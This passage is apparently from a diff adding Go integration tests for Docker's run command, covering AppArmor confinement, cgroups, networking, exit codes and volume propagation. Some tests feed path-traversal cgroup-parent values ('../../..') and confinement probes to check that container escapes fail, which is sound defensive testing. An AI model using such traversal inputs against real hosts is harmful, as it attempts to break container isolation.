!strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + // Now, try running with the original client from this new trust server. This should fail because the new root is invalid. + runCmd = exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted run:\n%s", out) + } +} + +func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + pid1 := inspectField(c, id, "State.Pid") + + _, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1)) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestAppArmorDeniesPtrace(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux) + + // Run through 'sh' so we are NOT pid 1. Pid 1 may be able to trace + // itself, but pid>1 should not be able to trace pid1. + _, exitCode, _ := dockerCmdWithError("run", "busybox", "sh", "-c", "sh -c readlink /proc/1/ns/net") + if exitCode == 0 { + c.Fatal("ptrace was not successfully restricted by AppArmor") + } +} + +func (s *DockerSuite) TestAppArmorTraceSelf(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, SameHostDaemon, Apparmor) + + _, exitCode, _ := dockerCmdWithError("run", "busybox", "readlink", "/proc/1/ns/net") + if exitCode != 0 { + c.Fatal("ptrace of self failed.") + } +} + +func (s *DockerSuite) TestAppArmorDeniesChmodProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux, NotUserNamespace) + _, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "744", "/proc/cpuinfo") + if exitCode == 0 { + // If our test failed, attempt to repair the host system... + _, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "444", "/proc/cpuinfo") + if exitCode == 0 { + c.Fatal("AppArmor was unsuccessful in prohibiting chmod of /proc/* files.") + } + } +} + +func (s *DockerSuite) TestRunCapAddSYSTIME(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=SYS_TIME", "busybox", "sh", "-c", "grep ^CapEff /proc/self/status | sed 's/^CapEff:\t//' | grep ^0000000002000000$") +} + +// run create container failed should clean up the container +func (s *DockerSuite) TestRunCreateContainerFailedCleanUp(c *check.C) { + // TODO Windows. This may be possible to enable once link is supported + testRequires(c, DaemonIsLinux) + name := "unique_name" + _, _, err := dockerCmdWithError("run", "--name", name, "--link", "nothing:nothing", "busybox") + c.Assert(err, check.NotNil, check.Commentf("Expected docker run to fail!")) + + containerID, err := inspectFieldWithError(name, "Id") + c.Assert(err, checker.NotNil, check.Commentf("Expected not to have this container: %s!", containerID)) + c.Assert(containerID, check.Equals, "", check.Commentf("Expected not to have this container: %s!", containerID)) +} + +func (s *DockerSuite) TestRunNamedVolume(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name=test", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "echo hello > "+prefix+"/foo/bar") + + out, _ := dockerCmd(c, "run", "--volumes-from", "test", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + + out, _ = dockerCmd(c, "run", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") +} + +func (s *DockerSuite) TestRunWithUlimits(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "--name=testulimits", "--ulimit", "nofile=42", "busybox", "/bin/sh", "-c", "ulimit -n") + ul := strings.TrimSpace(out) + if ul != "42" { + c.Fatalf("expected `ulimit -n` to be 42, got %s", ul) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + name := "cgroup-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "/cgroup-parent/test" + name := "cgroup-test" + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. +func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST" + cleanCgroupParent := "SHOULD_NOT_EXIST" + name := "cgroup-invalid-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + // XXX: This may include a daemon crash. + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + + // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. + if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { + c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") + } + + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cleanCgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. +func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST" + cleanCgroupParent := "/SHOULD_NOT_EXIST" + name := "cgroup-absolute-invalid-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + // XXX: This may include a daemon crash. + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + + // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. + if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { + c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!") + } + + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cleanCgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupMountRO(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + + filename := "/sys/fs/cgroup/devices/test123" + out, _, err := dockerCmdWithError("run", "busybox", "touch", filename) + if err == nil { + c.Fatal("expected cgroup mount point to be read-only, touch file should fail") + } + expected := "Read-only file system" + if !strings.Contains(out, expected) { + c.Fatalf("expected output from failure to contain %s but contains %s", expected, out) + } +} + +func (s *DockerSuite) TestRunContainerNetworkModeToSelf(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--name=me", "--net=container:me", "busybox", "true") + if err == nil || !strings.Contains(out, "cannot join own network") { + c.Fatalf("using container net mode to self should result in an error\nerr: %q\nout: %s", err, out) + } +} + +func (s *DockerSuite) TestRunContainerNetModeWithDNSMacHosts(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--name", "parent", "busybox", "top") + if err != nil { + c.Fatalf("failed to run container: %v, output: %q", err, out) + } + + out, _, err = dockerCmdWithError("run", "--dns", "1.2.3.4", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkAndDNS.Error()) { + c.Fatalf("run --net=container with --dns should error out") + } + + out, _, err = dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29:33", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictContainerNetworkAndMac.Error()) { + c.Fatalf("run --net=container with --mac-address should error out") + } + + out, _, err = dockerCmdWithError("run", "--add-host", "test:192.168.2.109", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkHosts.Error()) { + c.Fatalf("run --net=container with --add-host should error out") + } +} + +func (s *DockerSuite) TestRunContainerNetModeWithExposePort(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + out, _, err := dockerCmdWithError("run", "-p", "5000:5000", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) { + c.Fatalf("run --net=container with -p should error out") + } + + out, _, err = dockerCmdWithError("run", "-P", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) { + c.Fatalf("run --net=container with -P should error out") + } + + out, _, err = dockerCmdWithError("run", "--expose", "5000", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkExposePorts.Error()) { + c.Fatalf("run --net=container with --expose should error out") + } +} + +func (s *DockerSuite) TestRunLinkToContainerNetMode(c *check.C) { + // Not applicable on Windows which does not support --net=container or --link + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test", "-d", "busybox", "top") + dockerCmd(c, "run", "--name", "parent", "-d", "--net=container:test", "busybox", "top") + dockerCmd(c, "run", "-d", "--link=parent:parent", "busybox", "top") + dockerCmd(c, "run", "--name", "child", "-d", "--net=container:parent", "busybox", "top") + dockerCmd(c, "run", "-d", "--link=child:child", "busybox", "top") +} + +func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C) { + // TODO Windows: This may be possible to convert. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--net=none", "busybox", "ip", "-o", "-4", "a", "show", "up") + + var ( + count = 0 + parts = strings.Split(out, "\n") + ) + + for _, l := range parts { + if l != "" { + count++ + } + } + + if count != 1 { + c.Fatalf("Wrong interface count in container %d", count) + } + + if !strings.HasPrefix(out, "1: lo") { + c.Fatalf("Wrong interface in test container: expected [1: lo], got %s", out) + } +} + +// Issue #4681 +func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) { + if daemonPlatform == "windows" { + dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + } else { + dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1") + } +} + +func (s *DockerSuite) TestRunModeNetContainerHostname(c *check.C) { + // Windows does not support --net=container + testRequires(c, DaemonIsLinux, ExecSupport) + + dockerCmd(c, "run", "-i", "-d", "--name", "parent", "busybox", "top") + out, _ := dockerCmd(c, "exec", "parent", "cat", "/etc/hostname") + out1, _ := dockerCmd(c, "run", "--net=container:parent", "busybox", "cat", "/etc/hostname") + + if out1 != out { + c.Fatal("containers with shared net namespace should have same hostname") + } +} + +func (s *DockerSuite) TestRunNetworkNotInitializedNoneMode(c *check.C) { + // TODO Windows: Network settings are not currently propagated. This may + // be resolved in the future with the move to libnetwork and CNM. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top") + id := strings.TrimSpace(out) + res := inspectField(c, id, "NetworkSettings.Networks.none.IPAddress") + if res != "" { + c.Fatalf("For 'none' mode network must not be initialized, but container got IP: %s", res) + } +} + +func (s *DockerSuite) TestTwoContainersInNetHost(c *check.C) { + // Not applicable as Windows does not support --net=host + testRequires(c, DaemonIsLinux, NotUserNamespace, NotUserNamespace) + dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=host", "--name=second", "busybox", "top") + dockerCmd(c, "stop", "first") + dockerCmd(c, "stop", "second") +} + +func (s *DockerSuite) TestContainersInUserDefinedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork") + dockerCmd(c, "run", "-d", "--net=testnetwork", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-t", "--net=testnetwork", "--name=second", "busybox", "ping", "-c", "1", "first") +} + +func (s *DockerSuite) TestContainersInMultipleNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // Check connectivity between containers in testnetwork2 + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + // Connect containers to testnetwork2 + dockerCmd(c, "network", "connect", "testnetwork2", "first") + dockerCmd(c, "network", "connect", "testnetwork2", "second") + // Check connectivity between containers + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") +} + +func (s *DockerSuite) TestContainersNetworkIsolation(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + // Run 1 container in testnetwork1 and another in testnetwork2 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork2", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Check Isolation between containers : ping must fail + _, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.NotNil) + // Connect first container to testnetwork2 + dockerCmd(c, "network", "connect", "testnetwork2", "first") + // ping must succeed now + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.IsNil) + + // Disconnect first container from testnetwork2 + dockerCmd(c, "network", "disconnect", "testnetwork2", "first") + // ping must fail again + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestNetworkRmWithActiveContainers(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // Network delete with active containers must fail + _, _, err := dockerCmdWithError("network", "rm", "testnetwork1") + c.Assert(err, check.NotNil) + + dockerCmd(c, "stop", "first") + _, _, err = dockerCmdWithError("network", "rm", "testnetwork1") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestContainerRestartInMultipleNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // Check connectivity between containers in testnetwork2 + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + // Connect containers to testnetwork2 + dockerCmd(c, "network", "connect", "testnetwork2", "first") + dockerCmd(c, "network", "connect", "testnetwork2", "second") + // Check connectivity between containers + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") + + // Stop second container and test ping failures on both networks + dockerCmd(c, "stop", "second") + _, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork1") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork2") + c.Assert(err, check.NotNil) + + // Start second container and connectivity must be restored on both networks + dockerCmd(c, "start", "second") + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") +} + +func (s *DockerSuite) TestContainerWithConflictingHostNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Run a container with --net=host + dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + _, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestContainerWithConflictingSharedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + // Run second container in first container's network namespace + dockerCmd(c, "run", "-d", "--net=container:first", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "second") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrConflictSharedNetwork.Error()) +} + +func (s *DockerSuite) TestContainerWithConflictingNoneNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--net=none", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrConflictNoNetwork.Error()) + + // create a container connected to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Connect second container to none network. it must fail as well + _, _, err = dockerCmdWithError("network", "connect", "none", "second") + c.Assert(err, check.NotNil) +} + +// #11957 - stdin with no tty does not exit if stdin is not closed even though container exited +func (s *DockerSuite) TestRunStdinBlockedAfterContainerExit(c *check.C) { + cmd := exec.Command(dockerBinary, "run", "-i", "--name=test", "busybox", "true") + in, err := cmd.StdinPipe() + c.Assert(err, check.IsNil) + defer in.Close() + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + cmd.Stderr = stdout + c.Assert(cmd.Start(), check.IsNil) + + waitChan := make(chan error) + go func() { + waitChan <- cmd.Wait() + }() + + select { + case err := <-waitChan: + c.Assert(err, check.IsNil, check.Commentf(stdout.String())) + case <-time.After(30 * time.Second): + c.Fatal("timeout waiting for command to exit") + } +} + +func (s *DockerSuite) TestRunWrongCpusetCpusFlagValue(c *check.C) { + // TODO Windows: This needs validation (error out) in the daemon. + testRequires(c, DaemonIsLinux) + out, exitCode, err := dockerCmdWithError("run", "--cpuset-cpus", "1-10,11--", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Error response from daemon: Invalid value 1-10,11-- for cpuset cpus.\n" + if !(strings.Contains(out, expected) || exitCode == 125) { + c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: %v", expected, out, exitCode) + } +} + +func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) { + // TODO Windows: This needs validation (error out) in the daemon. + testRequires(c, DaemonIsLinux) + out, exitCode, err := dockerCmdWithError("run", "--cpuset-mems", "1-42--", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Error response from daemon: Invalid value 1-42-- for cpuset mems.\n" + if !(strings.Contains(out, expected) || exitCode == 125) { + c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: %v", expected, out, exitCode) + } +} + +// TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127' +func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) { + name := "testNonExecutableCmd" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == 127 && strings.Contains(stateExitCode, "127")) { + c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) + } +} + +// TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127. +func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { + name := "testNonExistingCmd" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == 127 && strings.Contains(stateExitCode, "127")) { + c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) + } +} + +// TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or +// 127 on Windows. The difference is that in Windows, the container must be started +// as that's when the check is made (and yes, by its design...) +func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) { + expected := 126 + if daemonPlatform == "windows" { + expected = 127 + } + name := "testCmdCannotBeInvoked" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) { + c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode) + } +} + +// TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains 'Unable to find image' +func (s *DockerSuite) TestRunNonExistingImage(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "foo") + out, exit, err := runCommandWithOutput(runCmd) + if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) { + c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err) + } +} + +// TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed +func (s *DockerSuite) TestDockerFails(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox") + out, exit, err := runCommandWithOutput(runCmd) + if !(err != nil && exit == 125) { + c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err) + } +} + +// TestRunInvalidReference invokes docker run with a bad reference. +func (s *DockerSuite) TestRunInvalidReference(c *check.C) { + out, exit, _ := dockerCmdWithError("run", "busybox@foo") + if exit == 0 { + c.Fatalf("expected non-zero exist code; received %d", exit) + } + + if !strings.Contains(out, "Error parsing reference") { + c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out) + } +} + +// Test fix for issue #17854 +func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) { + // Not applicable on Windows as it does not support Linux uid/gid ownership + testRequires(c, DaemonIsLinux) + name := "testetcfileownership" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'dockerio:x:1001:' >> /etc/group + RUN chown dockerio:dockerio /etc`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that dockerio ownership of /etc is retained at runtime + out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc") + out = strings.TrimSpace(out) + if out != "dockerio:dockerio" { + c.Fatalf("Wrong /etc ownership: expected dockerio:dockerio, got %q", out) + } +} + +func (s *DockerSuite) TestRunWithOomScoreAdj(c *check.C) { + testRequires(c, DaemonIsLinux) + + expected := "642" + out, _ := dockerCmd(c, "run", "--oom-score-adj", expected, "busybox", "cat", "/proc/self/oom_score_adj") + oomScoreAdj := strings.TrimSpace(out) + if oomScoreAdj != "642" { + c.Fatalf("Expected oom_score_adj set to %q, got %q instead", expected, oomScoreAdj) + } +} + +func (s *DockerSuite) TestRunWithOomScoreAdjInvalidRange(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _, err := dockerCmdWithError("run", "--oom-score-adj", "1001", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]." + if !strings.Contains(out, expected) { + c.Fatalf("Expected output to contain %q, got %q instead", expected, out) + } + out, _, err = dockerCmdWithError("run", "--oom-score-adj", "-1001", "busybox", "true") + c.Assert(err, check.NotNil) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]." + if !strings.Contains(out, expected) { + c.Fatalf("Expected output to contain %q, got %q instead", expected, out) + } +} + +func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) { + // Volume propagation is linux only. Also it creates directories for + // bind mounting, so needs to be same host. + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // Prepare a source directory to bind mount + tmpDir, err := ioutil.TempDir("", "volume-source") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil { + c.Fatal(err) + } + + // Convert this directory into a shared mount point so that we do + // not rely on propagation properties of parent mount. + cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1") + + // Make sure a bind mount under a shared volume propagated to host. + if mounted, _ := mount.Mounted(path.Join(tmpDir, "mnt1")); !mounted { + c.Fatalf("Bind mount under shared volume did not propagate to host") + } + + mount.Unmount(path.Join(tmpDir, "mnt1")) +} + +func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) { + // Volume propagation is linux only. Also it creates directories for + // bind mounting, so needs to be same host. + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // Prepare a source directory to bind mount + tmpDir, err := ioutil.TempDir("", "volume-source") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil { + c.Fatal(err) + } + + // Prepare a source directory with file in it. We will bind mount this + // directory and see if file shows up. + tmpDir2, err := ioutil.TempDir("", "volume-source2") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir2) + + if err := ioutil.WriteFile(path.Join(tmpDir2, 